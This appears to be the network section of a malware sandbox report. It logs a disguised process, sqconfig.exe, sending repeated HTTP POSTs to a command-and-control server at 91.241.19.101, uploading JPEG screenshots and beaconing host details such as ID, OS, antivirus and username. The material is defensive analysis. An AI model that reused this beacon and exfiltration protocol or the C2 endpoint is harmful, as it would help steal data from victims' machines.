                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  198192.168.2.35003491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:58.329257011 CEST19528OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:58.329592943 CEST19529OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:58.330008984 CEST19539OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:58.330454111 CEST19541OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:58.439898968 CEST19555OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:58.439965963 CEST19567OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:58.550931931 CEST19575OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:58.551018000 CEST19594OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:58.551361084 CEST19609OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:58.551482916 CEST19614OUTData Raw: 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 a8 ea da 8a e9 56 4b 74 c8 19 4c f0 c2 72 db 42 89 25 58 f7 67 db 76 7f 0e d4 01 8d 6f e2 3d 56 4d 33 4f d5 25 d2 6c d2 c2 f5 ad c2 94 be 66 95 56 67 45 52 57 ca 03 23 78 c8 dd eb c9 ae 9e bc fa db 5c
                                                                  Data Ascii: ((((VKtLrB%Xgvo=VM3O%lfVgERW#x\MRc:bC"r6st]Q?v8\P^&*BMODVH?,@HWe`s5#5i~)D\h86#WV:[
                                                                  Sep 30, 2021 23:53:58.551572084 CEST19614OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 2d 2d 0d 0a
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912--
                                                                  Sep 30, 2021 23:53:58.733134031 CEST19616INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  199192.168.2.35003591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:58.592678070 CEST19615OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:58.822046995 CEST19616INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.34976191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:49.787933111 CEST7059OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:49.788383961 CEST7059OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:49.788683891 CEST7069OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:49.788924932 CEST7072OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:49.918165922 CEST7075OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:49.918229103 CEST7078OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:49.918248892 CEST7080OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:49.918390036 CEST7088OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:49.918509960 CEST7091OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:52:49.919300079 CEST7093OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:49.919342995 CEST7098OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:50.253880024 CEST7147INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  20192.168.2.34977991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:55.537512064 CEST7689OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----85e8c95abb4d0498d71f1d5dacd6f5e6
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 93053
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:55.537590027 CEST7689OUTData Raw: 2d 2d 2d 2d 2d 2d 38 35 65 38 63 39 35 61 62 62 34 64 30 34 39 38 64 37 31 66 31 64 35 64 61 63 64 36 66 35 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------85e8c95abb4d0498d71f1d5dacd6f5e6Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:55.537801027 CEST7699OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:55.537902117 CEST7702OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:55.667303085 CEST7705OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:55.667354107 CEST7716OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:55.667387962 CEST7721OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:52:55.667401075 CEST7723OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:55.667509079 CEST7728OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:55.802376986 CEST7731OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:55.802819014 CEST7733OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:52:56.149847031 CEST7784INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  200192.168.2.35003691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:59.066694975 CEST19617OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:59.248153925 CEST19656INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  201192.168.2.35003791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:59.085778952 CEST19617OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:59.085901976 CEST19618OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:59.086143970 CEST19628OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:59.086308002 CEST19630OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:59.201581001 CEST19641OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:59.201630116 CEST19650OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
